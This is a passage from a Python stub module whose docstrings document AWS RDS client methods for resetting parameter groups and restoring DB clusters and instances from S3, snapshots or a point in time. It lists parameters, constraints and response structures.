'ApplyMethod': 'immediate'|'pending-reboot'
},
]
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: [REQUIRED]
The name of the DB cluster parameter group to reset.
:type ResetAllParameters: boolean
:param ResetAllParameters: A value that is set to true to reset all parameters in the DB cluster parameter group to their default values, and false otherwise. You cannot use this parameter if there is a list of parameter names specified for the Parameters parameter.
:type Parameters: list
:param Parameters: A list of parameter names in the DB cluster parameter group to reset to the default values. You cannot use this parameter if the ResetAllParameters parameter is set to true .
(dict) --This data type is used as a request parameter in the ModifyDBParameterGroup and ResetDBParameterGroup actions.
This data type is used as a response element in the DescribeEngineDefaultParameters and DescribeDBParameters actions.
ParameterName (string) --Specifies the name of the parameter.
ParameterValue (string) --Specifies the value of the parameter.
Description (string) --Provides a description of the parameter.
Source (string) --Indicates the source of the parameter value.
ApplyType (string) --Specifies the engine specific parameters type.
DataType (string) --Specifies the valid data type for the parameter.
AllowedValues (string) --Specifies the valid range of values for the parameter.
IsModifiable (boolean) --Indicates whether (true ) or not (false ) the parameter can be modified. Some parameters have security or operational implications that prevent them from being changed.
MinimumEngineVersion (string) --The earliest engine version to which the parameter can apply.
ApplyMethod (string) --Indicates when to apply parameter updates.
:rtype: dict
:return: {
'DBClusterParameterGroupName': 'string'
}
:returns:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
"""
pass
def reset_db_parameter_group(DBParameterGroupName=None, ResetAllParameters=None, Parameters=None):
"""
Modifies the parameters of a DB parameter group to the engine/system default value. To reset specific parameters, provide a list of the following: ParameterName and ApplyMethod . To reset the entire DB parameter group, specify the DBParameterGroup name and ResetAllParameters parameters. When resetting the entire group, dynamic parameters are updated immediately and static parameters are set to pending-reboot to take effect on the next DB instance restart or RebootDBInstance request.
See also: AWS API Documentation
Examples
This example resets all parameters for the specified DB parameter group to their default values.
Expected Output:
:example: response = client.reset_db_parameter_group(
DBParameterGroupName='string',
ResetAllParameters=True|False,
Parameters=[
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
]
)
:type DBParameterGroupName: string
:param DBParameterGroupName: [REQUIRED]
The name of the DB parameter group.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type ResetAllParameters: boolean
:param ResetAllParameters: Specifies whether (true ) or not (false ) to reset all parameters in the DB parameter group to default values.
Default: true
:type Parameters: list
:param Parameters: To reset the entire DB parameter group, specify the DBParameterGroup name and ResetAllParameters parameters. To reset specific parameters, provide a list of the following: ParameterName and ApplyMethod . A maximum of 20 parameters can be modified in a single request.
MySQL
Valid Values (for Apply method): immediate | pending-reboot
You can use the immediate value with dynamic parameters only. You can use the pending-reboot value for both dynamic and static parameters, and changes are applied when DB instance reboots.
MariaDB
Valid Values (for Apply method): immediate | pending-reboot
You can use the immediate value with dynamic parameters only. You can use the pending-reboot value for both dynamic and static parameters, and changes are applied when DB instance reboots.
Oracle
Valid Values (for Apply method): pending-reboot
(dict) --This data type is used as a request parameter in the ModifyDBParameterGroup and ResetDBParameterGroup actions.
This data type is used as a response element in the DescribeEngineDefaultParameters and DescribeDBParameters actions.
ParameterName (string) --Specifies the name of the parameter.
ParameterValue (string) --Specifies the value of the parameter.
Description (string) --Provides a description of the parameter.
Source (string) --Indicates the source of the parameter value.
ApplyType (string) --Specifies the engine specific parameters type.
DataType (string) --Specifies the valid data type for the parameter.
AllowedValues (string) --Specifies the valid range of values for the parameter.
IsModifiable (boolean) --Indicates whether (true ) or not (false ) the parameter can be modified. Some parameters have security or operational implications that prevent them from being changed.
MinimumEngineVersion (string) --The earliest engine version to which the parameter can apply.
ApplyMethod (string) --Indicates when to apply parameter updates.
:rtype: dict
:return: {
'DBParameterGroupName': 'string'
}
"""
pass
def restore_db_cluster_from_s3(AvailabilityZones=None, BackupRetentionPeriod=None, CharacterSetName=None, DatabaseName=None, DBClusterIdentifier=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, DBSubnetGroupName=None, Engine=None, EngineVersion=None, Port=None, MasterUsername=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, Tags=None, StorageEncrypted=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None, SourceEngine=None, SourceEngineVersion=None, S3BucketName=None, S3Prefix=None, S3IngestionRoleArn=None):
"""
Creates an Amazon Aurora DB cluster from data stored in an Amazon S3 bucket. Amazon RDS must be authorized to access the Amazon S3 bucket and the data must be created using the Percona XtraBackup utility as described in Migrating Data from MySQL by Using an Amazon S3 Bucket .
See also: AWS API Documentation
:example: response = client.restore_db_cluster_from_s3(
AvailabilityZones=[
'string',
],
BackupRetentionPeriod=123,
CharacterSetName='string',
DatabaseName='string',
DBClusterIdentifier='string',
DBClusterParameterGroupName='string',
VpcSecurityGroupIds=[
'string',
],
DBSubnetGroupName='string',
Engine='string',
EngineVersion='string',
Port=123,
MasterUsername='string',
MasterUserPassword='string',
OptionGroupName='string',
PreferredBackupWindow='string',
PreferredMaintenanceWindow='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageEncrypted=True|False,
KmsKeyId='string',
EnableIAMDatabaseAuthentication=True|False,
SourceEngine='string',
SourceEngineVersion='string',
S3BucketName='string',
S3Prefix='string',
S3IngestionRoleArn='string'
)
:type AvailabilityZones: list
:param AvailabilityZones: A list of EC2 Availability Zones that instances in the restored DB cluster can be created in.
(string) --
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days for which automated backups of the restored DB cluster are retained. You must specify a minimum value of 1.
Default: 1
Constraints:
Must be a value from 1 to 35
:type CharacterSetName: string
:param CharacterSetName: A value that indicates that the restored DB cluster should be associated with the specified CharacterSet.
:type DatabaseName: string
:param DatabaseName: The database name for the restored DB cluster.
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The name of the DB cluster to create from the source data in the S3 bucket. This parameter is isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster1
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: The name of the DB cluster parameter group to associate with the restored DB cluster. If this argument is omitted, default.aurora5.6 will be used.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of EC2 VPC security groups to associate with the restored DB cluster.
(string) --
:type DBSubnetGroupName: string
:param DBSubnetGroupName: A DB subnet group to associate with the restored DB cluster.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type Engine: string
:param Engine: [REQUIRED]
The name of the database engine to be used for the restored DB cluster.
Valid Values: aurora
:type EngineVersion: string
:param EngineVersion: The version number of the database engine to use.
Aurora
Example: 5.6.10a
:type Port: integer
:param Port: The port number on which the instances in the restored DB cluster accept connections.
Default: 3306
:type MasterUsername: string
:param MasterUsername: [REQUIRED]
The name of the master user for the restored DB cluster.
Constraints:
Must be 1 to 16 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
:type MasterUserPassword: string
:param MasterUserPassword: [REQUIRED]
The password for the master database user. This password can contain any printable ASCII character except '/', ''', or '@'.
Constraints: Must contain from 8 to 41 characters.
:type OptionGroupName: string
:param OptionGroupName: A value that indicates that the restored DB cluster should be associated with the specified option group.
Permanent options cannot be removed from an option group. An option group cannot be removed from a DB cluster once it is associated with a DB cluster.
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled using the BackupRetentionPeriod parameter.
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
Format: ddd:hh24:mi-ddd:hh24:mi
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageEncrypted: boolean
:param StorageEncrypted: Specifies whether the restored DB cluster is encrypted.
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier for an encrypted DB cluster.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are creating a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KM encryption key.
If the StorageEncrypted parameter is true, and you do not specify a value for the KmsKeyId parameter, then Amazon RDS will use your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS region.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
Default: false
:type SourceEngine: string
:param SourceEngine: [REQUIRED]
The identifier for the database engine that was backed up to create the files stored in the Amazon S3 bucket.
Valid values: mysql
:type SourceEngineVersion: string
:param SourceEngineVersion: [REQUIRED]
The version of the database that the backup files were created from.
MySQL version 5.5 and 5.6 are supported.
Example: 5.6.22
:type S3BucketName: string
:param S3BucketName: [REQUIRED]
The name of the Amazon S3 bucket that contains the data used to create the Amazon Aurora DB cluster.
:type S3Prefix: string
:param S3Prefix: The prefix for all of the file names that contain the data used to create the Amazon Aurora DB cluster. If you do not specify a SourceS3Prefix value, then the Amazon Aurora DB cluster is created by using all of the files in the Amazon S3 bucket.
:type S3IngestionRoleArn: string
:param S3IngestionRoleArn: [REQUIRED]
The Amazon Resource Name (ARN) of the AWS Identity and Access Management (IAM) role that authorizes Amazon RDS to access the Amazon S3 bucket on your behalf.
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def restore_db_cluster_from_snapshot(AvailabilityZones=None, DBClusterIdentifier=None, SnapshotIdentifier=None, Engine=None, EngineVersion=None, Port=None, DBSubnetGroupName=None, DatabaseName=None, OptionGroupName=None, VpcSecurityGroupIds=None, Tags=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None):
"""
Creates a new DB cluster from a DB cluster snapshot. The target DB cluster is created from the source DB cluster restore point with the same configuration as the original source DB cluster, except that the new DB cluster is created with the default security group.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
The following example restores an Amazon Aurora DB cluster from a DB cluster snapshot.
Expected Output:
:example: response = client.restore_db_cluster_from_snapshot(
AvailabilityZones=[
'string',
],
DBClusterIdentifier='string',
SnapshotIdentifier='string',
Engine='string',
EngineVersion='string',
Port=123,
DBSubnetGroupName='string',
DatabaseName='string',
OptionGroupName='string',
VpcSecurityGroupIds=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
KmsKeyId='string',
EnableIAMDatabaseAuthentication=True|False
)
:type AvailabilityZones: list
:param AvailabilityZones: Provides the list of EC2 Availability Zones that instances in the restored DB cluster can be created in.
(string) --
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The name of the DB cluster to create from the DB cluster snapshot. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-snapshot-id
:type SnapshotIdentifier: string
:param SnapshotIdentifier: [REQUIRED]
The identifier for the DB cluster snapshot to restore from.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Engine: string
:param Engine: [REQUIRED]
The database engine to use for the new DB cluster.
Default: The same as source
Constraint: Must be compatible with the engine of the source
:type EngineVersion: string
:param EngineVersion: The version of the database engine to use for the new DB cluster.
:type Port: integer
:param Port: The port number on which the new DB cluster accepts connections.
Constraints: Value must be 1150-65535
Default: The same port as the original DB cluster.
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The name of the DB subnet group to use for the new DB cluster.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type DatabaseName: string
:param DatabaseName: The database name for the restored DB cluster.
:type OptionGroupName: string
:param OptionGroupName: The name of the option group to use for the restored DB cluster.
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of VPC security groups that the new DB cluster will belong to.
(string) --
:type Tags: list
:param Tags: The tags to be assigned to the restored DB cluster.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier to use when restoring an encrypted DB cluster from a DB cluster snapshot.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are restoring a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
If you do not specify a value for the KmsKeyId parameter, then the following will occur:
If the DB cluster snapshot is encrypted, then the restored DB cluster is encrypted using the KMS key that was used to encrypt the DB cluster snapshot.
If the DB cluster snapshot is not encrypted, then the restored DB cluster is encrypted using the specified encryption key.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
Default: false
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def restore_db_cluster_to_point_in_time(DBClusterIdentifier=None, SourceDBClusterIdentifier=None, RestoreToTime=None, UseLatestRestorableTime=None, Port=None, DBSubnetGroupName=None, OptionGroupName=None, VpcSecurityGroupIds=None, Tags=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None):
"""
Restores a DB cluster to an arbitrary point in time. Users can restore to any point in time before LatestRestorableTime for up to BackupRetentionPeriod days. The target DB cluster is created from the source DB cluster with the same configuration as the original DB cluster, except that the new DB cluster is created with the default DB security group.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
The following example restores a DB cluster to a new DB cluster at a point in time from the source DB cluster.
Expected Output:
:example: response = client.restore_db_cluster_to_point_in_time(
DBClusterIdentifier='string',
SourceDBClusterIdentifier='string',
RestoreToTime=datetime(2015, 1, 1),
UseLatestRestorableTime=True|False,
Port=123,
DBSubnetGroupName='string',
OptionGroupName='string',
VpcSecurityGroupIds=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
KmsKeyId='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The name of the new DB cluster to be created.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type SourceDBClusterIdentifier: string
:param SourceDBClusterIdentifier: [REQUIRED]
The identifier of the source DB cluster from which to restore.
Constraints:
Must be the identifier of an existing database instance
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type RestoreToTime: datetime
:param RestoreToTime: The date and time to restore the DB cluster to.
Valid Values: Value must be a time in Universal Coordinated Time (UTC) format
Constraints:
Must be before the latest restorable time for the DB instance
Cannot be specified if UseLatestRestorableTime parameter is true
Example: 2015-03-07T23:45:00Z
:type UseLatestRestorableTime: boolean
:param UseLatestRestorableTime: A value that is set to true to restore the DB cluster to the latest restorable backup time, and false otherwise.
Default: false
Constraints: Cannot be specified if RestoreToTime parameter is provided.
:type Port: integer
:param Port: The port number on which the new DB cluster accepts connections.
Constraints: Value must be 1150-65535
Default: The same port as the original DB cluster.
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The DB subnet group name to use for the new DB cluster.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type OptionGroupName: string
:param OptionGroupName: The name of the option group for the new DB cluster.
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A lst of VPC security groups that the new DB cluster belongs to.
(string) --
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier to use when restoring an encrypted DB cluster from an encrypted DB cluster.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are restoring a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
You can restore to a new DB cluster and encrypt the new DB cluster with a KMS key that is different than the KMS key used to encrypt the source DB cluster. The new DB cluster will be encrypted with the KMS key identified by the KmsKeyId parameter.
If you do not specify a value for the KmsKeyId parameter, then the following will occur:
If the DB cluster is encrypted, then the restored DB cluster is encrypted using the KMS key that was used to encrypt the source DB cluster.
If the DB cluster is not encrypted, then the restored DB cluster is not encrypted.
If DBClusterIdentifier refers to a DB cluster that is note encrypted, then the restore request is rejected.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
Default: false
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def restore_db_instance_from_db_snapshot(DBInstanceIdentifier=None, DBSnapshotIdentifier=None, DBInstanceClass=None, Port=None, AvailabilityZone=None, DBSubnetGroupName=None, MultiAZ=None, PubliclyAccessible=None, AutoMinorVersionUpgrade=None, LicenseModel=None, DBName=None, Engine=None, Iops=None, OptionGroupName=None, Tags=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, Domain=None, CopyTagsToSnapshot=None, DomainIAMRoleName=None, EnableIAMDatabaseAuthentication=None):
"""
Creates a new DB instance from a DB snapshot. The target database is created from the source database restore point with the most of original configuration with the default security group and the default DB parameter group. By default, the new DB instance is created as a single-AZ deployment except when the instance is a SQL Server instance that has an option group that is associated with mirroring; in this case, the instance becomes a mirrored AZ deployment and not a single-AZ deployment.
If your intent is to replace your original DB instance with the new, restored DB instance, then rename your original DB instance before you call the RestoreDBInstanceFromDBSnapshot action. RDS does not allow two DB instances with the same name. Once you have renamed your original DB instance with a different identifier, then you can pass the original name of the DB instance as the DBInstanceIdentifier in the call to the RestoreDBInstanceFromDBSnapshot action. The result is that you will replace the original DB instance with the DB instance created from the snapshot.
If you are restoring from a shared manual DB snapshot, the DBSnapshotIdentifier must be the ARN of the shared DB snapshot.
See also: AWS API Documentation
:example: response = client.restore_db_instance_from_db_snapshot(
DBInstanceIdentifier='string',
DBSnapshotIdentifier='string',
DBInstanceClass='string',
Port=123,
AvailabilityZone='string',
DBSubnetGroupName='string',
MultiAZ=True|False,
PubliclyAccessible=True|False,
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
DBName='string',
Engine='string',
Iops=123,
OptionGroupName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
Domain='string',
CopyTagsToSnapshot=True|False,
DomainIAMRoleName='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
Name of the DB instance to create from the DB snapshot. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens (1 to 15 for SQL Server)
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-snapshot-id
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier for the DB snapshot to restore from.
Constraints:
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
If you are restoring from a shared manual DB snapshot, the DBSnapshotIdentifier must be the ARN of the shared DB snapshot.
:type DBInstanceClass: string
:param DBInstanceClass: The compute and memory capacity of the Amazon RDS DB instance.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
:type Port: integer
:param Port: The port number on which the database accepts connections.
Default: The same port as the original DB instance
Constraints: Value must be 1150-65535
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in.
Default: A random, system-chosen Availability Zone.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
Example: us-east-1a
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The DB subnet group name to use for the new instance.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor version upgrades will be applied automatically to the DB instance during the maintenance window.
:type LicenseModel: string
:param LicenseModel: License model information for the restored DB instance.
Default: Same as source.
Valid values: license-included | bring-your-own-license | general-public-license
:type DBName: string
:param DBName: The database name for the restored DB instance.
Note
This parameter doesn't apply to the MySQL, PostgreSQL, or MariaDB engines.
:type Engine: string
:param Engine: The database engine to use for the new instance.
Default: The same as source
Constraint: Must be compatible with the engine of the source. You can restore a MariaDB 10.1 DB instance from a MySQL 5.6 snapshot.
Valid Values: MySQL | mariadb | oracle-se1 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
:type Iops: integer
:param Iops: Specifies the amount of provisioned IOPS for the DB instance, expressed in I/O operations per second. If this parameter is not specified, the IOPS value will be taken from the backup. If this parameter is set to 0, the new instance will be converted to a non-PIOPS instance, which will take additional time, though your DB instance will be available for connections before the conversion starts.
Constraints: Must be an integer greater than 1000.
SQL Server
Setting the IOPS value for the SQL Server database engine is not supported.
:type OptionGroupName: string
